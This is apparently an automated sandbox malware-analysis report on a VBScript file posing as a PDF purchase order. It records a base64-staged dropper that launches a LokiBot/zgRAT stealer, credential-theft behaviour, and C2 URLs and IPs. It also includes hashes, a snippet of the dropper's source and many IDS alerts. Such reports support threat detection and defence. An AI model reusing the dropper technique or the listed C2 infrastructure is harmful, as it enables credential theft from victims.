                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                          Process Injection
                          NTDS2
                          File and Directory Discovery
                          Distributed Component Object ModelInput Capture113
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                          Deobfuscate/Decode Files or Information
                          LSA Secrets13
                          System Information Discovery
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts5
                          Obfuscated Files or Information
                          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                          Software Packing
                          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading
                          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1421256 Sample: #U0410#U0433#U0440#U043e-#U... Startdate: 06/04/2024 Architecture: WINDOWS Score: 100 26 altaskifer.sbs 2->26 40 Snort IDS alert for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 11 other signatures 2->46 8 wscript.exe 2 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\Temp\x.exe, PE32 8->24 dropped 48 Benign windows process drops PE files 8->48 50 VBScript performs obfuscated calls to suspicious functions 8->50 52 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->52 12 x.exe 1 8->12         started        signatures6 process7 signatures8 54 Antivirus detection for dropped file 12->54 56 Multi AV Scanner detection for dropped file 12->56 58 Machine Learning detection for dropped file 12->58 60 4 other signatures 12->60 15 aspnet_compiler.exe 1 129 12->15         started        20 aspnet_compiler.exe 12->20         started        process9 dnsIp10 28 altaskifer.sbs 172.67.148.126, 49717, 49718, 49719 CLOUDFLARENETUS United States 15->28 22 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 15->22 dropped 30 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->30 32 Tries to steal Mail credentials (via file / registry access) 15->32 34 Tries to harvest and steal ftp login credentials 15->34 36 Tries to harvest and steal browser information (history, passwords, etc) 15->36 38 Tries to steal Mail credentials (via file registry) 20->38 file11 signatures12

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs22%VirustotalBrowse
                          #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs32%ReversingLabsScript-WScript.Trojan.AgentTesla
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1362225
                          C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\x.exe74%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\x.exe40%VirustotalBrowse
                          C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                          C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          altaskifer.sbs1%VirustotalBrowse
                          SourceDetectionScannerLabelLink
                          http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                          http://alphastand.win/alien/fre.php100%URL Reputationmalware
                          http://alphastand.win/alien/fre.php100%URL Reputationmalware
                          http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                          http://alphastand.top/alien/fre.php100%URL Reputationmalware
                          http://www.ibsensoftware.com/0%URL Reputationsafe
                          https://altaskifer.sbs/PWS/fre.php0%Avira URL Cloudsafe
                          http://altaskifer.sbs/PWS/fre.php0%Avira URL Cloudsafe
                          https://altaskifer.sbs/PWS/fre.php1%VirustotalBrowse
                          http://altaskifer.sbs/PWS/fre.php3%VirustotalBrowse
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          altaskifer.sbs
                          172.67.148.126
                          truetrueunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://altaskifer.sbs/PWS/fre.phptrue
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://kbfvzoboss.bid/alien/fre.phptrue
                          • URL Reputation: malware
                          unknown
                          http://alphastand.win/alien/fre.phptrue
                          • URL Reputation: malware
                          • URL Reputation: malware
                          unknown
                          http://alphastand.trade/alien/fre.phptrue
                          • URL Reputation: malware
                          unknown
                          http://altaskifer.sbs/PWS/fre.phptrue
                          • 3%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://alphastand.top/alien/fre.phptrue
                          • URL Reputation: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          172.67.148.126
                          altaskifer.sbsUnited States
                          13335CLOUDFLARENETUStrue
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1421256
                          Start date and time:2024-04-06 09:28:13 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs
                          renamed because original name is a hash value
                          Original Sample Name:-_(PO_460387320)_pdf.vbs
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winVBS@7/5@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 94%
                          • Number of executed functions: 49
                          • Number of non-executed functions: 12
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          09:29:25API Interceptor140x Sleep call for process: aspnet_compiler.exe modified
                          No context
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSfedex awb & invoice.vbsGet hashmaliciousUnknownBrowse
                          • 172.67.215.45
                          FEB-MAR SOA 2024.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                          • 104.26.5.15
                          https://boxpool-pro.firebaseapp.com/Get hashmaliciousUnknownBrowse
                          • 172.64.150.248
                          https://nft-openbox-e24a0.web.app/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://mysteryclick47.on.fleek.co/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://mysteryclicks40.on.fleek.co/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://claim-webopensea.web.app/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          https://mysteryclick39.on.fleek.co/Get hashmaliciousUnknownBrowse
                          • 172.64.150.248
                          https://mysteryclicks20.on.fleek.co/Get hashmaliciousUnknownBrowse
                          • 104.17.25.14
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Roaming\188E93\31437F.exe6038732).vbsGet hashmaliciousLokibotBrowse
                            cirby0J3LP.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWorm, zgRATBrowse
                              SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  3vj5tYFb6a.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                    50000PCSPIC12F1501-ESN.exeGet hashmaliciousAgentTeslaBrowse
                                      SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exeGet hashmaliciousXWormBrowse
                                        Jdxvyx.exeGet hashmaliciousAgentTeslaBrowse
                                          SecuriteInfo.com.Win32.TrojanX-gen.11530.1442.exeGet hashmaliciousAgentTeslaBrowse
                                            shipping_doc_62085317440.exeGet hashmaliciousAgentTeslaBrowse
                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):226
                                              Entropy (8bit):5.360398796477698
                                              Encrypted:false
                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                              MD5:3A8957C6382192B71471BD14359D0B12
                                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):309760
                                              Entropy (8bit):6.909465550785168
                                              Encrypted:false
                                              SSDEEP:6144:soNzeBVxZLh3JBSc7eDP0GzBUi+PScPJq8s7WtEAmg+:VoftSc7Cff+PScBq8s7WtEAmD
                                              MD5:F5259113B28AA9CB170D1D4C7003F79F
                                              SHA1:4A4D7845A0C998EAE218D0679CF523FCE936E513
                                              SHA-256:5325F01A1F5A633A64A42107D1B7D730732B73298E58B266C6197278BCB5595F
                                              SHA-512:D9020D437328C2E3D9D0E9F8184373A9F48C821C07B2E05103A91FD58829447C34D8DB63C7D8A04EBA01009892B3983D459BD6CA987B4E7D781A7F314158645D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 74%
                                              • Antivirus: Virustotal, Detection: 40%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b.f..............0.................. ........@.. ....................... ............`.....................................K...................................9................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................(O..Yp...........................................(....(M...(x...8.....*.(*...8....(k...8....&~.......*...~....*..0..........8........E....9...........84.....(U...%& .l..(U...%& .l..(U...%&(.... .l..(U...%& .l..(U...%&o....%& .l..(U...%& .l..(U...%&o.... .l..(U...%& .l..(U...%&o....%& .l..(U...%& .l..(U...%&o....(......8.....*(}...8J....(E...(....%&%.(E......%.(E...~.....%..(E......%..(E.....(E........... ....(....9....&8....(....(....%&.. ....(....:...
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):56368
                                              Entropy (8bit):6.120994357619221
                                              Encrypted:false
                                              SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                              MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                              SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                              SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                              SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                              Joe Sandbox View:
                                              • Filename: 6038732).vbs, Detection: malicious, Browse
                                              • Filename: cirby0J3LP.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                              • Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse
                                              • Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe, Detection: malicious, Browse
                                              • Filename: Jdxvyx.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Win32.TrojanX-gen.11530.1442.exe, Detection: malicious, Browse
                                              • Filename: shipping_doc_62085317440.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):49
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:884BB48A55DA67B4812805CB8905277D
                                              SHA1:6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
                                              SHA-256:78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
                                              SHA-512:989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:.................................................
                                              File type:ASCII text, with very long lines (65294), with CRLF line terminators
                                              Entropy (8bit):4.876074580626131
                                              TrID:
                                                File name:#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs
                                                File size:520'546 bytes
                                                MD5:055c0925042cb8d785f50c598449a755
                                                SHA1:b9a1ef638c9f8445ee5f8d9536a752e85f6264a5
                                                SHA256:262001fa47c949d07b1998343285eff24a6c5603f5d60946bee05728412bfe5a
                                                SHA512:b04316d155e50aac59c0dd85e3e10445fab222fa3aaf95522a3f604c083b9a2d5311326714ed316a850889b7af3b9c250c55e9f9322d5f8eedb92107428243bd
                                                SSDEEP:6144:joo0L2LxOF3NXwg6+IPhlyS8AW1KWTTVT/qaNKk4dcZvV++9VsK3VcVVYASzkIDL:jGtNXwd+IuvAW1Kub4detsngASzkIDXb
                                                TLSH:6DB48DA6FF233DC22A5CC4938B450BFBFCA468AD42926760B5EEFA54351C472285DD0D
                                                File Content Preview:Dim x, y, z..x = "MSXML2.DOMDocument"..y = "text"..z = "bin.base64"....Set obj1 = CreateObject(x)..Set obj2 = obj1.createElement(y)..obj2.DataType = z....' Replace "yourbase64strjbg" with your actual base64 encoded content..Dim base64String..base64String
                                                Icon Hash:68d69b8f86ab9a86
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                04/06/24-09:29:38.036927TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.6172.67.148.126
                                                04/06/24-09:29:36.488685TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.6172.67.148.126
                                                04/06/24-09:30:53.641650TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.2.6172.67.148.126
                                                04/06/24-09:30:51.314444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.6172.67.148.126
                                                04/06/24-09:30:13.652600TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.6172.67.148.126
                                                04/06/24-09:30:53.641650TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.861510TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.957388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.6172.67.148.126
                                                04/06/24-09:30:50.516269TCP2825766ETPRO TROJAN LokiBot Checkin M24983180192.168.2.6172.67.148.126
                                                04/06/24-09:29:36.488685TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.6172.67.148.126
                                                04/06/24-09:30:28.779878TCP2825766ETPRO TROJAN LokiBot Checkin M24980380192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.907019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.6172.67.148.126
                                                04/06/24-09:30:29.547586TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.124910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.6172.67.148.126
                                                04/06/24-09:31:19.370644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.6172.67.148.126
                                                04/06/24-09:30:02.814837TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.6172.67.148.126
                                                04/06/24-09:30:48.181654TCP2825766ETPRO TROJAN LokiBot Checkin M24982880192.168.2.6172.67.148.126
                                                04/06/24-09:31:21.669304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.204192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.6172.67.148.126
                                                04/06/24-09:30:31.907019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.961991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.6172.67.148.126
                                                04/06/24-09:29:59.690030TCP2825766ETPRO TROJAN LokiBot Checkin M24976680192.168.2.6172.67.148.126
                                                04/06/24-09:31:18.590588TCP2825766ETPRO TROJAN LokiBot Checkin M24986480192.168.2.6172.67.148.126
                                                04/06/24-09:30:00.493399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.6172.67.148.126
                                                04/06/24-09:29:28.699735TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.204192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.6172.67.148.126
                                                04/06/24-09:30:42.736556TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.6172.67.148.126
                                                04/06/24-09:31:21.669304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.2.6172.67.148.126
                                                04/06/24-09:30:54.422589TCP2825766ETPRO TROJAN LokiBot Checkin M24983680192.168.2.6172.67.148.126
                                                04/06/24-09:31:11.610579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.799315TCP2825766ETPRO TROJAN LokiBot Checkin M24974180192.168.2.6172.67.148.126
                                                04/06/24-09:30:17.895022TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.6172.67.148.126
                                                04/06/24-09:30:25.641172TCP2825766ETPRO TROJAN LokiBot Checkin M24979980192.168.2.6172.67.148.126
                                                04/06/24-09:29:44.242163TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.6172.67.148.126
                                                04/06/24-09:29:56.595283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.6172.67.148.126
                                                04/06/24-09:31:23.961991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.6172.67.148.126
                                                04/06/24-09:30:46.592042TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.6172.67.148.126
                                                04/06/24-09:31:17.815577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.860100TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.6172.67.148.126
                                                04/06/24-09:30:57.593507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.6172.67.148.126
                                                04/06/24-09:31:17.815577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.6172.67.148.126
                                                04/06/24-09:30:21.735500TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.891260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.970310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.6172.67.148.126
                                                04/06/24-09:29:35.705322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.6172.67.148.126
                                                04/06/24-09:29:41.891260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.6172.67.148.126
                                                04/06/24-09:29:53.470085TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.6172.67.148.126
                                                04/06/24-09:29:38.036927TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.862546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.6172.67.148.126
                                                04/06/24-09:29:37.260471TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.6172.67.148.126
                                                04/06/24-09:30:24.862546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979880192.168.2.6172.67.148.126
                                                04/06/24-09:29:30.251229TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.128553TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.6172.67.148.126
                                                04/06/24-09:30:37.305241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.6172.67.148.126
                                                04/06/24-09:30:10.531874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.203747TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.6172.67.148.126
                                                04/06/24-09:30:35.733011TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.6172.67.148.126
                                                04/06/24-09:30:37.305241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.6172.67.148.126
                                                04/06/24-09:30:06.739588TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.891670TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.6172.67.148.126
                                                04/06/24-09:30:20.970310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.6172.67.148.126
                                                04/06/24-09:29:55.035047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.6172.67.148.126
                                                04/06/24-09:29:42.690473TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.6172.67.148.126
                                                04/06/24-09:31:24.825007TCP2825766ETPRO TROJAN LokiBot Checkin M24987280192.168.2.6172.67.148.126
                                                04/06/24-09:30:10.531874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.6172.67.148.126
                                                04/06/24-09:29:40.344957TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.6172.67.148.126
                                                04/06/24-09:30:49.735329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.2.6172.67.148.126
                                                04/06/24-09:29:43.454363TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.6172.67.148.126
                                                04/06/24-09:30:49.735329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.6172.67.148.126
                                                04/06/24-09:30:32.673178TCP2825766ETPRO TROJAN LokiBot Checkin M24980880192.168.2.6172.67.148.126
                                                04/06/24-09:31:07.768549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.079276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.6172.67.148.126
                                                04/06/24-09:30:34.975531TCP2825766ETPRO TROJAN LokiBot Checkin M24981180192.168.2.6172.67.148.126
                                                04/06/24-09:29:34.079276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.6172.67.148.126
                                                04/06/24-09:29:45.799677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.6172.67.148.126
                                                04/06/24-09:31:15.463121TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.6172.67.148.126
                                                04/06/24-09:31:07.768549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.921065TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.6172.67.148.126
                                                04/06/24-09:29:33.293191TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.6172.67.148.126
                                                04/06/24-09:29:58.921065TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.6172.67.148.126
                                                04/06/24-09:29:29.470677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.6172.67.148.126
                                                04/06/24-09:30:27.986411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.6172.67.148.126
                                                04/06/24-09:29:29.470677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.6172.67.148.126
                                                04/06/24-09:30:38.088060TCP2825766ETPRO TROJAN LokiBot Checkin M24981680192.168.2.6172.67.148.126
                                                04/06/24-09:30:05.124910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.6172.67.148.126
                                                04/06/24-09:31:05.441892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.2.6172.67.148.126
